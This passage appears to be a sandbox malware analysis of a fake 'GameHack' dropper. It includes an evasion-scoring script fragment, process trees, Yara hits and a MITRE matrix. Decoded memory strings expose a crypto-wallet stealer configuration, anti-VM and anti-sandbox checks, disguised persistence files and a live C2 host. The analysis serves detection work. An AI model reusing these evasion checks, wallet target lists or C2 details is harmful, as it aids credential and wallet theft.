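    r"Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BIOS",
    r"Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe TID: 7328Thread sleep time: -922337203685477s >= -30000s",
    r"Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe TID: 7980Thread sleep count: 163 > 30",
    r"Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX",
    r"Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX",
    "Source: " + r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" + "\tMemory allocated: 2BE0000 memory reserve | memory write watch",
    "Source: " + r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464" + "\tThread sleep count: 1612 > 30",
    "Source: " + r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" + "\tThread delayed: delay time: 300000",
]

if __name__ == "__main__":
    for proc, result in sorted(score_evasion(SAMPLE_LINES).items()):
        print(f"{proc:18} score={result['score']:2}  {result['indicators']}")
```

Two caveats when reading this section alongside the score. The \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00 strings found in wscript.exe, GameHack.exe, containerRuntime.exe and RegAsm.exe memory are the analysis VM's own device-interface paths; they show up even in Microsoft's wscript.exe here, so on their own they are environment residue, not evidence of a VM check. Only Solara.exe carries explicit VM-detection code (the Go package paths goware/pkg/detection/Anti_VM and AntiVM/pkg/detection/Anti_VM/VMWare.go) and backs it with the Win32_DiskDrive, Win32_BIOS and Win32_BaseBoard queries and the wmic child process. Likewise, the IsDebuggerPresent / SetUnhandledExceptionFilter / UnhandledExceptionFilter chains reported further down for GameHackBuild1.exe.bin.exe and GameHack.exe match the MSVC CRT's __scrt_fastfail and __raise_securityfailure sequences that every MSVC-linked binary carries, which is why the example does not score them.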
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe	API call chain: ExitProcess graph end node	graph_0-24556
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe	API call chain: ExitProcess graph end node	graph_8-24466
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe	Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe	Code function: 0_2_00A2866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe	Code function: 0_2_00A2753D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe	Code function: 8_2_00EF753D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe	Code function: 0_2_00A2B710 GetProcessHeap
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe	Code function: 0_2_00A1F063 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe	Code function: 0_2_00A1F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe	Code function: 0_2_00A2866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe	Code function: 0_2_00A1EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe	Code function: 8_2_00EEF063 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe	Code function: 8_2_00EEF22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe	Code function: 8_2_00EF866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe	Code function: 8_2_00EEEF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe	Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe"
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe	Process created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe"
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe	Process created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe"
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe	Process created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\DaJttDh54LCmoatNZvevDoWyEmexKWgun1WAXP2cdZM0egnWJQQpZtVxW.bat" "
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe	Process created: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe "C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe"
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\chainReviewdhcp\mJEJ7PbY35CMaAu5227dvHv.vbe"
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get model,serialnumber
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe	Process created: unknown unknown (7 identical entries)
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\chainReviewdhcp\LJrjU6BhAd6hMsY1uw5hl2I0p3Jh.bat" "
Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor/runtimesvc.exe"
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline"
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe	Process created: unknown unknown (8 identical entries)
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe "C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe"
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe	Process created: unknown unknown (6 identical entries)
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess created: unknown unknown
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5B8E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC8F87101CD76241BAB3866A995ECAD4A7.TMP"
                      Source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ProgMan
                      Source: Solara.exe, 00000009.00000002.2515285033.0000000000401000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: %sinvalid styleSetWindowLongShell_TrayWndDestroyWindowGetWindowLongGetWindowRectGetClientRectSTREAM_CLOSEDCONNECT_ERRORWINDOW_UPDATEAuthorizationCache-ControlLast-ModifiedAccept-RangesIf-None-Match[FrameHeader invalid base accept-rangesauthorizationcache-controlcontent-rangeif-none-matchlast-modifiedFQDN too longsocks connectReset ContentLoop Detectedfield name %qFindFirstFile3814697265625RegOpenKeyExWRegEnumValueWImageList_AddCreateRectRgnGetDeviceCapsSetBrushOrgExValueOverflowCreateActCtxWFindResourceWRtlMoveMemoryCoTaskMemFreeOleInitializeSysFreeStringwglShareListsPdhCloseQueryShellExecuteWAnimateWindowDrawFocusRectGetClassNameWGetMenuItemIDGetScrollInfoGetSystemMenuSetScrollInfoGetThemeColorOpenThemeDataEnumPrintersWwakeableSleepprofMemActiveprofMemFuturetraceStackTabexecRInternaltestRInternalGC sweep waitout of memory is nil, not value method bad map state span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase}
                      Source: Solara.exeBinary or memory string: Stack: %sinvalid styleSetWindowLongShell_TrayWndDestroyWindowGetWindowLongGetWindowRectGetClientRectSTREAM_CLOSEDCONNECT_ERRORWINDOW_UPDATEAuthorizationCache-ControlLast-ModifiedAccept-RangesIf-None-Match[FrameHeader invalid base accept-rangesauthorizationca
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A1ED5B cpuid 0_2_00A1ED5B
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00A1A63C
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: GetLocaleInfoW,GetNumberFormatW,8_2_00EEA63C
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeQueries volume information: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeQueries volume information: C:\Windows\Web\Wallpaper\Windows\img0.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeQueries volume information: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeQueries volume information: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeQueries volume information: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeQueries volume information: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A1D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00A1D5D4
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A0ACF5 GetVersionExW,0_2_00A0ACF5
                      Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

Source: Yara match | File source: 23.2.runtimesvc.exe.1ba70000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.runtimesvc.exe.1ba70000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001A.00000002.1720636580.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.1998107194.000000001BA70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.1720636580.00000000029E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.1959832866.000000001322D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.1846009611.00000000125BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: runtimesvc.exe PID: 4920, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: containerRuntime.exe PID: 7620, type: MEMORYSTR
Source: containerRuntime.exe, 0000001A.00000002.1720636580.0000000002692000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: {"6c695916fbddfd6c86d9c925ce0f3d9296d13743":{"antilowmemory":"==QZ1JHV","recheck":"=U2csFmR","antivm":"==QZ1JHV","antiwindowsserver":"==QZ1JHV","antisandbox":"==QZ1JHV","antidebuggers":"==QZ1JHV","antiprocessmonitors":"==QZ1JHV","antihttpdebuggers":"==QZ1JHV","antianyrunvt":"==QZ1JHV","ramlim":"==AOyADN"},"2d421f511019ab10b4005cadf6e8fab088ff728d":{"zcash":"==QZ1JHV","exodus":"==QZ1JHV","electrum":"==QZ1JHV","monero":"==QZ1JHV","ethereum":"==QZ1JHV","bytecoin":"==QZ1JHV","litecoincore":"==QZ1JHV","dashcore":"==QZ1JHV","bitcoincore":"==QZ1JHV","atomic":"==QZ1JHV","armory":"==QZ1JHV","binance":"==QZ1JHV","metamask":"==QZ1JHV","tronlink":"==QZ1JHV","ronin":"==QZ1JHV","binanceweb":"==QZ1JHV","phantom":"==QZ1JHV","ton":"==QZ1JHV","yoroi":"==QZ1JHV","extscanscheme":"yV2cVBCduVmcyV3Q"},"3229e69b07edc9bd628bb55e1896cde346364250":{"workscheme":"zRGbpVnQ"},"b4de96d4f5b80f0481953e762e42bc2a3abd9dba":{"processes":"5RXayV3YlNnbvRncv5mCkNXZtMnbK8VYylmdhpwc0BjNzogclRmblZWZkRXaipQZlZWYj1mCzVncpZXa05WYK8FdzFmdhpQMyMHdrpAc1RXZzJWb","windows":"lVmZhNWbKwWY09GdgAjNzowc39GZul2dgoL04CdvQLY04CdiRDL03CtCyVGZuVmZlRGIzd3bk5Wa3pAIyVGZuVmZlRGdpJmCkJXY1dGbsVnYKMXZ0lnYlJXY3xWYtpQespnepJ3ZKkHdpJXdjV2cg42b0J3bupQgRPY0AGNuQLL04CtgR3L0wCtCzVncpZXa05WYKIWZ3JHZKk3azJXZwNXYrpAdzFmdhpAdlNXZ"}}
Source: runtimesvc.exe, 00000017.00000002.1874336688.00000000031A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: cjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty
Source: runtimesvc.exe, 00000017.00000002.1874336688.00000000031A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: aholpfdialjgjfhomihkjbmgjidlcdno:Exodus
Source: containerRuntime.exe, 0000001A.00000002.1720636580.0000000002692000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: {"6c695916fbddfd6c86d9c925ce0f3d9296d13743":{"antilowmemory":"==QZ1JHV","recheck":"=U2csFmR","antivm":"==QZ1JHV","antiwindowsserver":"==QZ1JHV","antisandbox":"==QZ1JHV","antidebuggers":"==QZ1JHV","antiprocessmonitors":"==QZ1JHV","antihttpdebuggers":"==QZ1JHV","antianyrunvt":"==QZ1JHV","ramlim":"==AOyADN"},"2d421f511019ab10b4005cadf6e8fab088ff728d":{"zcash":"==QZ1JHV","exodus":"==QZ1JHV","electrum":"==QZ1JHV","monero":"==QZ1JHV","ethereum":"==QZ1JHV","bytecoin":"==QZ1JHV","litecoincore":"==QZ1JHV","dashcore":"==QZ1JHV","bitcoincore":"==QZ1JHV","atomic":"==QZ1JHV","armory":"==QZ1JHV","binance":"==QZ1JHV","metamask":"==QZ1JHV","tronlink":"==QZ1JHV","ronin":"==QZ1JHV","binanceweb":"==QZ1JHV","phantom":"==QZ1JHV","ton":"==QZ1JHV","yoroi":"==QZ1JHV","extscanscheme":"yV2cVBCduVmcyV3Q"},"3229e69b07edc9bd628bb55e1896cde346364250":{"workscheme":"zRGbpVnQ"},"b4de96d4f5b80f0481953e762e42bc2a3abd9dba":{"processes":"5RXayV3YlNnbvRncv5mCkNXZtMnbK8VYylmdhpwc0BjNzogclRmblZWZkRXaipQZlZWYj1mCzVncpZXa05WYK8FdzFmdhpQMyMHdrpAc1RXZzJWb","windows":"lVmZhNWbKwWY09GdgAjNzowc39GZul2dgoL04CdvQLY04CdiRDL03CtCyVGZuVmZlRGIzd3bk5Wa3pAIyVGZuVmZlRGdpJmCkJXY1dGbsVnYKMXZ0lnYlJXY3xWYtpQespnepJ3ZKkHdpJXdjV2cg42b0J3bupQgRPY0AGNuQLL04CtgR3L0wCtCzVncpZXa05WYKIWZ3JHZKk3azJXZwNXYrpAdzFmdhpAdlNXZ"}}
Source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: set_UseMachineKeyStore

                      Remote Access Functionality

Source: Yara match | File source: 23.2.runtimesvc.exe.1ba70000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.runtimesvc.exe.1ba70000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001A.00000002.1720636580.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.1998107194.000000001BA70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.1720636580.00000000029E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.1959832866.000000001322D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.1846009611.00000000125BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: runtimesvc.exe PID: 4920, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: containerRuntime.exe PID: 7620, type: MEMORYSTR
MITRE ATT&CK Matrix

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 11 Scripting | Valid Accounts | 211 Windows Management Instrumentation | 11 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 11 Input Capture | 1 System Time Discovery | 1 Taint Shared Content | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 3 Command and Scripting Interpreter | 1 DLL Side-Loading | 12 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 3 Obfuscated Files or Information | Security Account Manager | 147 System Information Discovery | SMB/Windows Admin Shares | 11 Input Capture | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | 31 Registry Run Keys / Startup Folder | 31 Registry Run Keys / Startup Folder | 13 Software Packing | NTDS | 221 Security Software Discovery | Distributed Component Object Model | Input Capture | 1 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 2 Process Discovery | SSH | Keylogging | 1 Proxy | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 33 Masquerading | Cached Domain Credentials | 131 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 131 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Behavior Graph ID: 1590018 | Sample: GameHackBuild1.exe.bin.exe | Start date: 13/01/2025 | Architecture: WINDOWS | Score: 100

Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 15 other signatures. DNS/IP: 25350.client.sudorat.top

Process tree recovered from the behavior graph (indentation shows parent/child; "dropped" lists files written by that process):

GameHackBuild1.exe.bin.exe (started)
  dropped: C:\Users\user\AppData\...\runtimesvc.exe (MS-DOS); C:\Users\user\AppData\Roaming\...\Solara.exe (MS-DOS); C:\Users\user\...\MpDefenderProtector.exe (PE32); 2 other malicious files
  signature: Found many strings related to Crypto-Wallets (likely being stolen)
  wscript.exe (started)
    signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
    cmd.exe (started)
      runtimesvc.exe (started)
        dropped: C:\Windows\security\...\SSblKNNQege.exe (MS-DOS); C:\Windows\Cursors\OfficeClickToRun.exe (MS-DOS); C:\Users\user\Desktop\wowiEjmi.log (PE32); 14 other malicious files
        signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Creates an undocumented autostart registry key; 5 other signatures
        csc.exe (started)
          dropped: C:\Program Files (x86)\...\msedge.exe (PE32)
          signature: Infects executable files (exe, dll, sys, html)
          conhost.exe (started)
          cvtres.exe (started)
      conhost.exe (started)
  GameHack.exe (started)
    dropped: C:\Users\user\...\containerRuntime.exe (PE32); C:\Users\user\...\mJEJ7PbY35CMaAu5227dvHv.vbe (data)
    signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
    wscript.exe (started)
      cmd.exe (started)
        containerRuntime.exe (started)
          dropped: C:\Windows\...\RuntimeBroker.exe (PE32); C:\Windows\L2Schemas\SSblKNNQege.exe (PE32); C:\Users\Default\Pictures\RuntimeBroker.exe (PE32); 6 other malicious files
          signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Creates an undocumented autostart registry key; 4 other signatures
        conhost.exe (started)
  MpDefenderProtector.exe (started)
    dropped: C:\Users\user\...\MpDefenderCoreProtion.exe (PE32); C:\Users\...\MpDefenderCoreProtion.exe.config (XML)
    MpDefenderCoreProtion.exe (started)
      signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
      RegAsm.exe (started)
        network: 25350.client.sudorat.top (185.37.62.158; ports 25350, 49702, 49803; HOSTLANDRU, Russian Federation); 127.0.0.1 (unknown)
  Solara.exe (started)
    signatures: Detected unpacking (changes PE section rights); Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines); Found Tor onion address
    WMIC.exe (started)
      signature: Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
    conhost.exe (started)
MpDefenderCoreProtion.exe (started as a second top-level process)

Source | Detection | Scanner | Label
GameHackBuild1.exe.bin.exe | 61% | Virustotal |
